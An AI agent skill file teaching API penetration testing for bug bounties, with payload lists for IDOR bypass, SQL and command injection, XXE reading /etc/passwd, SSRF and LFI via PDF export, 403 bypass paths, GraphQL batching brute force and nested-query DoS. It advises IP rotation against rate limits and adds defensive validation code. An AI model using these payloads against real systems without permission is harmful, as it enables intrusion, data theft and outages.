API Fuzzing for Bug Bounty

This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.

Author: zebbern
Version: 1.1


Purpose

Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.

Inputs/Prerequisites

  • Burp Suite or similar proxy tool

  • API wordlists (SecLists, api_wordlist)

  • Understanding of REST/GraphQL/SOAP protocols

  • Python for scripting

  • Target API endpoints and documentation (if available)

Outputs/Deliverables

  • Identified API vulnerabilities

  • IDOR exploitation proofs

  • Authentication bypass techniques

  • SQL injection points

  • Unauthorized data access documentation

API Types Overview

| Type    | Protocol | Data Format  | Structure         |
|---------|----------|--------------|-------------------|
| SOAP    | HTTP     | XML          | Header + Body     |
| REST    | HTTP     | JSON/XML/URL | Defined endpoints |
| GraphQL | HTTP     | Custom Query | Single endpoint   |


Core Workflow

Step 1: API Reconnaissance

Identify the API type and enumerate endpoints:

```bash
# Check for Swagger/OpenAPI documentation
/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html

# Use Kiterunner for API discovery
kr scan https://target.com -w routes-large.kite

# Extract paths from Swagger
python3 json2paths.py swagger.json
```

Step 2: Authentication Testing

```
# Test different login paths
/api/mobile/login
/api/v3/login
/api/magic_link
/api/admin/login

# Check rate limiting on auth endpoints
# If no rate limit → brute force possible

# Test mobile vs web API separately
# Don't assume the same security controls
```

Step 3: IDOR Testing

Insecure Direct Object Reference (IDOR) is the most common API vulnerability:

```
# Basic IDOR
GET /api/users/1234 → GET /api/users/1235

# Even if the ID is email-based, try numeric
/?user_id=111 instead of /?user_id=user@mail.com

# Test /me/orders vs /user/654321/orders
```

IDOR Bypass Techniques:

```
# Wrap ID in array
{"id":111} → {"id":[111]}

# JSON wrap
{"id":111} → {"id":{"id":111}}

# Send ID twice
URL?id=<LEGIT>&id=<VICTIM>

# Wildcard injection
{"user_id":"*"}

# Parameter pollution
/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id":<legit_id>,"user_id":<victim_id>}
```
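Added here as the defensive counterpart to the bypass list above (example code, not part of the original skill): a handler that refuses every shape those tricks rely on, accepting exactly one plain integer id that the caller owns. The names get_invoice, single_param, load_json_strict and OWNERS are hypothetical; OWNERS stands in for a database ownership lookup.

```python
import json
import re
from urllib.parse import parse_qsl

# Constructed ownership table standing in for a database lookup: invoice id -> owner
OWNERS = {12345: "alice", 12346: "bob"}
ID_RE = re.compile(r"[1-9][0-9]{0,17}")   # exactly one plain positive integer

def parse_object_id(raw):
    """Accept a bare integer or numeric string only. Arrays ({"id":[111]}),
    nested objects ({"id":{"id":111}}), wildcards ("*"), booleans and padded
    or zero-prefixed strings are rejected instead of being coerced."""
    if isinstance(raw, bool) or not isinstance(raw, (int, str)):
        raise ValueError("id must be an integer or a numeric string")
    if not ID_RE.fullmatch(str(raw)):
        raise ValueError("id must be a plain positive integer")
    return int(raw)

def single_param(query_string, name):
    """Defeat parameter pollution (?id=<legit>&id=<victim>): the parameter
    must be present exactly once, otherwise the request is refused."""
    values = [v for k, v in parse_qsl(query_string, keep_blank_values=True) if k == name]
    if len(values) != 1:
        raise ValueError("%s must be supplied exactly once" % name)
    return values[0]

def load_json_strict(body):
    """json.loads keeps the last of two duplicate keys, which is what the
    {"user_id":<legit>,"user_id":<victim>} trick relies on; reject duplicates."""
    def no_duplicates(pairs):
        keys = [k for k, _ in pairs]
        if len(keys) != len(set(keys)):
            raise ValueError("duplicate JSON keys")
        return dict(pairs)
    return json.loads(body, object_pairs_hook=no_duplicates)

def get_invoice(current_user, query_string):
    """Authorize on the canonical id plus ownership. Foreign and non-existent
    ids both get 404 so the response does not confirm which ids exist."""
    invoice_id = parse_object_id(single_param(query_string, "id"))
    if OWNERS.get(invoice_id) != current_user:
        return 404, None
    return 200, {"id": invoice_id, "owner": current_user}
```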

Step 4: Injection Testing

SQL Injection in JSON (boolean-based, then time-based, on a numeric id):

```
{"id":"56456"}                → OK
{"id":"56456 AND 1=1#"}       → OK
{"id":"56456 AND 1=2#"}       → OK
{"id":"56456 AND 1=3#"}       → ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC
```

Command Injection:

```
# Ruby on Rails
?url=Kernel#open → ?url=|ls

# Linux command injection
api.url.com/endpoint?name=file.txt;ls%20/
```

XXE Injection:

```xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
```

SSRF via API:

```html
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
```

.NET Path.Combine Vulnerability:

Path.Combine returns its second argument unchanged when that argument is rooted (a drive-letter path or a UNC path), so the intended base directory is silently discarded.

```
# If a .NET app uses Path.Combine(path_1, path_2), test for path traversal
https://example.org/download?filename=a.png
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
```

Step 5: Method Testing

```
# Test all HTTP methods
GET /api/v1/users/1
POST /api/v1/users/1
PUT /api/v1/users/1
DELETE /api/v1/users/1
PATCH /api/v1/users/1

# Switch content type
Content-Type: application/json → application/xml
```


GraphQL-Specific Testing

Introspection Query

Fetch the entire backend schema:

```graphql
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
```

URL-encoded version:

```
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
```

GraphQL IDOR

```graphql
# Try accessing other user IDs
query {
  user(id: "OTHER_USER_ID") {
    email
    password
    creditCard
  }
}
```

GraphQL SQL/NoSQL Injection

```graphql
mutation {
  login(input: {
    email: "test' or 1=1--"
    password: "password"
  }) {
    success
    jwt
  }
}
```

Rate Limit Bypass (Batching)

```graphql
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
```

GraphQL DoS (Nested Queries)

```graphql
query {
  posts {
    comments {
      user {
        posts {
          comments {
            user {
              posts { ... }
            }
          }
        }
      }
    }
  }
}
```
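A pre-execution guard for the two request shapes just shown, batched login mutations that dodge a per-request rate limit and deeply nested queries, added here as example code rather than anything from the original skill. The names scan_query, check_graphql_request, MAX_DEPTH and MAX_OPERATIONS are hypothetical and the limits are illustrative; LOGIN and NESTED are one-line versions of the queries above.

```python
MAX_DEPTH = 6        # deepest selection nesting accepted (the introspection query above is 6)
MAX_OPERATIONS = 1   # operations per request; anything more is a batch

# Constructed one-line versions of the queries from the section above
LOGIN = 'mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}'
NESTED = "query{posts{comments{user{posts{comments{user{posts{id}}}}}}}}"

def scan_query(query):
    """Return (max_depth, operations) from brace depth outside string literals.
    Brace depth is a conservative proxy for selection-set depth (input-object
    literals count too, which only tightens the limit); production code should
    walk the parsed AST rather than the raw text."""
    depth = deepest = operations = 0
    in_string = escaped = False
    for ch in query:
        if in_string:                      # ignore braces inside "..." arguments
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch == "{":
            if depth == 0:
                operations += 1            # each operation opens one top-level selection set
            depth += 1
            deepest = max(deepest, depth)
        elif ch == "}":
            depth -= 1
            if depth < 0:
                raise ValueError("unbalanced braces")
    if depth != 0 or in_string:
        raise ValueError("malformed query")
    return deepest, operations

def check_graphql_request(payload):
    """Gate a decoded POST body (one {"query": ...} object or a JSON array
    batch) before execution; returns (ok, reason)."""
    items = payload if isinstance(payload, list) else [payload]
    if len(items) > MAX_OPERATIONS:
        return False, "batch of %d requests exceeds the limit" % len(items)
    for item in items:
        deepest, operations = scan_query(item.get("query", ""))
        if operations > MAX_OPERATIONS:
            return False, "%d operations in one document" % operations
        if deepest > MAX_DEPTH:
            return False, "selection depth %d exceeds %d" % (deepest, MAX_DEPTH)
    return True, "ok"
```

Alias-based batching (several `login` fields under one operation) is not caught by a brace count; that needs the AST walk the docstring mentions.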

GraphQL XSS

```
# XSS via GraphQL endpoint
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}

# URL-encoded XSS
http://target.com/example?id=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E
```

GraphQL Tools

| Tool         | Purpose               |
|--------------|-----------------------|
| GraphCrawler | Schema discovery      |
| graphw00f    | Fingerprinting        |
| clairvoyance | Schema reconstruction |
| InQL         | Burp extension        |
| GraphQLmap   | Exploitation          |

Endpoint Bypass Techniques

When receiving a 403/401, try these bypasses:

```
# Original blocked request
/api/v1/users/sensitivedata → 403

# Bypass attempts
/api/v1/users/sensitivedata.json
/api/v1/users/sensitivedata?
/api/v1/users/sensitivedata/
/api/v1/users/sensitivedata??
/api/v1/users/sensitivedata%20
/api/v1/users/sensitivedata%09
/api/v1/users/sensitivedata#
/api/v1/users/sensitivedata&details
/api/v1/users/..;/sensitivedata
```


Output Exploitation

PDF Export Attacks

```html
<!-- LFI via PDF export -->
<iframe src="file:///etc/passwd" height=1000 width=800>

<!-- SSRF via PDF export -->
<object data="http://127.0.0.1:8443"/>

<!-- Port scanning -->
<img src="http://127.0.0.1:445"/>

<!-- IP disclosure -->
<img src="https://iplogger.com/yourcode.gif"/>
```

DoS via Limits

```
# Normal request
/api/news?limit=100

# DoS attempt
/api/news?limit=9999999999
```


Common API Vulnerabilities Checklist

| Vulnerability          | Description                                          |
|------------------------|------------------------------------------------------|
| API Exposure           | Unprotected endpoints exposed publicly               |
| Misconfigured Caching  | Sensitive data cached incorrectly                    |
| Exposed Tokens         | API keys/tokens in responses or URLs                 |
| JWT Weaknesses         | Weak signing, no expiration, algorithm confusion     |
| IDOR / BOLA            | Broken Object Level Authorization                    |
| Undocumented Endpoints | Hidden admin/debug endpoints                         |
| Different Versions     | Security gaps in older API versions                  |
| Rate Limiting          | Missing or bypassable rate limits                    |
| Race Conditions        | TOCTOU vulnerabilities                               |
| XXE Injection          | XML parser exploitation                              |
| Content Type Issues    | Switching between JSON/XML                           |
| HTTP Method Tampering  | GET→DELETE/PUT abuse                                 |


Quick Reference

| Vulnerability     | Test Payload             | Risk     |
|-------------------|--------------------------|----------|
| IDOR              | Change user_id parameter | High     |
| SQLi              | `' OR 1=1--` in JSON     | Critical |
| Command Injection | `; ls /`                 | Critical |
| XXE               | DOCTYPE with ENTITY      | High     |
| SSRF              | Internal IP in params    | High     |
| Rate Limit Bypass | Batch requests           | Medium   |
| Method Tampering  | GET→DELETE               | High     |


Tools Reference

| Category       | Tool                     | URL                                                             |
|----------------|--------------------------|-----------------------------------------------------------------|
| API Fuzzing    | Fuzzapi                  | github.com/Fuzzapi/fuzzapi                                      |
| API Fuzzing    | API-fuzzer               | github.com/Fuzzapi/API-fuzzer                                   |
| API Fuzzing    | Astra                    | github.com/flipkart-incubator/Astra                             |
| API Security   | apicheck                 | github.com/BBVA/apicheck                                        |
| API Discovery  | Kiterunner               | github.com/assetnote/kiterunner                                 |
| API Discovery  | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner                    |
| API Toolkit    | APIKit                   | github.com/API-Security/APIKit                                  |
| API Keys       | API Guesser              | api-guesser.netlify.app                                         |
| GUID           | GUID Guesser             | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18        |
| GraphQL        | InQL                     | github.com/doyensec/inql                                        |
| GraphQL        | GraphCrawler             | github.com/gsmith257-cyber/GraphCrawler                         |
| GraphQL        | graphw00f                | github.com/dolevf/graphw00f                                     |
| GraphQL        | clairvoyance             | github.com/nikitastupin/clairvoyance                            |
| GraphQL        | batchql                  | github.com/assetnote/batchql                                    |
| GraphQL        | graphql-cop              | github.com/dolevf/graphql-cop                                   |
| Wordlists      | SecLists                 | github.com/danielmiessler/SecLists                              |
| Swagger Parser | Swagger-EZ               | rhinosecuritylabs.github.io/Swagger-EZ                          |
| Swagger Routes | swagroutes               | github.com/amalmurali47/swagroutes                              |
| API Mindmap    | MindAPI                  | dsopas.github.io/MindAPI/play                                   |
| JSON Paths     | json2paths               | github.com/s0md3v/dump/tree/master/json2paths                   |


Constraints

Must:

  • Test mobile, web, and developer APIs separately

  • Check all API versions (/v1, /v2, /v3)

  • Validate both authenticated and unauthenticated access

Must Not:

  • Assume the same security controls across API versions

  • Skip testing undocumented endpoints

  • Ignore rate limiting checks

Should:

  • Add the X-Requested-With: XMLHttpRequest header to simulate the frontend

  • Check archive.org for historical API endpoints

  • Test for race conditions on sensitive operations

Examples

Example 1: IDOR Exploitation

```http
# Original request (own data)
GET /api/v1/invoices/12345
Authorization: Bearer <token>

# Modified request (other user's data)
GET /api/v1/invoices/12346
Authorization: Bearer <token>

# Response reveals the other user's invoice data
```

Example 2: GraphQL Introspection

```bash
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name}}}}"}'
```


Troubleshooting

| Issue                           | Solution                                          |
|---------------------------------|---------------------------------------------------|
| API returns nothing             | Add X-Requested-With: XMLHttpRequest header       |
| 401 on all endpoints            | Try adding a ?user_id=1 parameter                 |
| GraphQL introspection disabled  | Use clairvoyance for schema reconstruction        |
| Rate limited                    | Use IP rotation or batch requests                 |
| Can't find endpoints            | Check Swagger, archive.org, JS files              |
